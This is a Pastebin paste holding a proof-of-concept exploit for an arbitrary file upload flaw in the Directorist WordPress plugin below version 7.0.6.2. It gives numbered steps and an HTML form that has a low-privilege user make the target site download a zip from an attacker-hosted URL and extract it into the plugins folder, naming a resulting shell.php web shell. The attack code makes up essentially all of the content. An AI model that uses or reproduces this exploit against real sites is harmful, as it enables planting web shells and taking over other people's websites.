API tools faq
paste
Advertisement
Guest User

Directorist < 7.0.6.2 remote file upload exploit vulnerability

a guest
Nov 17th, 2021
1,497
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.04 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. POC: Upload files to the plugins folder of any site running directorist < 7.0.6.2
  4. Can be used to upload PHP files or replace a whole active plugin.
  5.  
  6. 1. Register / Login as user (subscriber will do).
  7. 2. Paste below HTML into any page on site.
  8. 3. Replace [target-site] with the target URL.
  9. 4. Repalce [site-with-payload-zip] with the URL hosting your zip file and submit the form.
  10. 5. Zip file contents will be extracted in plugins folder https://[target-site].com/wp-content/plugins/shell.php
  11. */
  12. ?>
  13. <form action="https://[target-site].com/wp-admin/admin-ajax.php" method="post">
  14.   <input type="text"  name="action" value="atbdp_download_file"><br>
  15.     <input type="text"  name="download_item[download_link]" value='https://[site-with-payload-zip].com/payload.zip'><br>    
  16.     <input type="text"  name="download_item[skip_licencing]" value='true'><br>
  17.     <input type="text"  name="download_item[permalink]" value='true'><br>    
  18.     <input type="text"  name="type" value="plugin"><br>
  19.   <input type="submit" value="Submit">
  20. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!